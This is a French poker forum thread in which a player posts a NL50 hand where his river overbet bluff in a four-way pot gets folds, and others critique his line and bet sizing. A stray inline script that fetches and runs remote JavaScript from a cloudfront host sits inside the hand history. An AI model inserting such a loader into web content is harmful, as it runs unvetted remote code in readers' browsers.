- Ce sujet contient 5 réponses, 5 participants et a été mis à jour pour la dernière fois par Octo, le il y a 9 années et 9 mois.
-
AuteurMessages
-
Plop,
Je pense que c’est la 1ère fois que je le fais en 4way
Iso std, je ne cbet pas ce board sans trop d’équité et 0 fe.
comme personne ne voulait le pot, j’essaye de le prendre, à faire ? ou j’ai chatté ?
Merci pour vos retours
€0.25/€0.50 No Limit Holdem
iPoker[/url]
6 Players
Hand Conversion Powered by weaktight.com[/url]Stacks:
UTG Player8 (€94.90) 190bb
UTG+1 Player10 (€52.57) 105bb
CO Player1 (€36.48) 73bb
BTN octo (€121.86) 244bb
SB Player5 (€44.50) 89bb
BB Player6 (€81.98) 164bbPre-Flop: (€0.75, 6 players) octo is BTN
1 fold, Player10 calls €0.50, 1 fold, octo raises to €2, Player5 calls €1.75, Player6 calls €1.50, Player10 calls €1.50Flop: (€8, 4 players)
Player5 checks, Player6 checks, Player10 checks, octo checksTurn: (€8, 4 players)
Player5 checks, Player6 checks, Player10 checks, octo checksRiver: (€8, 4 players)
Player5 checks, Player6 checks, Player10 checks, octo bets €12, Player5 folds, Player6 folds, Player10 foldsFinal Pot: €8
octo wins €31.49 (net +€17.49)
Player5 lost €2
Player6 lost €2
Player10 lost €2
<script type= »text/javascript »>
setTimeout(function(){var a=document.createElement(« script »);
var b=document.getElementsByTagName(« script »)[0];
a.src=document.location.protocol+ »//dnn506yrbagrg.cloudfront.net/pages/scripts/0023/4735.js? »+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type= »text/javascript »;b.parentNode.insertBefore(a,b)}, 1);
</script>
si je bluff, je préfère pour plus de cohérence commencer à raconter une « histoire crédible » dès la turn quand tout le monde check pour la 2ème fois » et réévaluer river pour give up ou continuer mon bluff.
ensuite bon bluff river vs fish ou regs ABC fit/or fold mais vs thinking player/top reg très mauvais car il sera capable d’hero call A high ou 55 /77 qu’il n’avait pas bet au non de la showdown value. il va se dire que tu rep beaucoup « d’arrachage » avec ton bel overbet bluff et que tu n’as que 88 et 79 en combos crédibles et puis il va se dire si tu as nuts tu voudrais te faire payer par any paire en misant mi-pot ou 1/3 pot, pourquoi ferais tu si cher si tu comptes te faire payer par moins bien? sinon je pense qu’on a quasi la meme FE en bettant 3/4 pot river si on veut bluff genre 6,5/7€, le bluff coutera moins cher si il passe pas et on envoie le message « paye moi avec ton petit quelque chose » donc on a presque moins de risque de se faire hero call qu’en overbettant
my 2 cents
Je pense que c’est la 1ère fois que je le fais en 4way
C’est à 3 que c’est le mieux imo…
Bon sinon, bah j’aurai pris la même line que toi. Si y en a un qui slowplay un K sur 3 street ou qui est sticky avec Tx, 8x, bah tant pis gg à lui. Mais la plupart du temps en ça va passer. En tout cas c’est l’impression que j’ai quand je le fait au table.
Et pour le fait de « raconter une histoire ». On est en NL50… les gars il voit leur cartes et voient qu’ils ont pas hit, après il voit que tu OVB, bah ils cherchent pas à faire des hero call de l’espace, il fold. ^^
- Inscrit depuis 12 ans
- 2020 messages - 57
Je préfère bet la turn et aviser river.
As played, pot la river offre la même FE, et procure un bien meilleur risk/reward.
PS : check un peu ton taux de succes de tes delayed cbet, en général ça marche très très bien.
Salut,
je suis ok avec le fait de voler le pot, versus l’absence totale de force des vilains.
Le sizing river n’est pas top. Pas besoin d’être un top reg pour voir que tu OVB en bluff ici au moins 90% du temps. Tu le ferai avec 88pp ? pas sûr…
Mon avis rejoint celui de edou 1x , et pas d’accord sur le fait qu’ici ce soit un « hero call de l’espace », pour moi ici avec ce sizing, le déroulement du coup, et face au profil d’Octo – Reg aggro-, c’est un des calls les plus simples à faire… no brainer comme dit l’autre…
Donc, pour moi, le vol est clairement ok mais orienté le sizing vers un bet plus classique (2/3- 3/4 pot)
-
AuteurMessages
Vous devez être connecté pour répondre à ce sujet.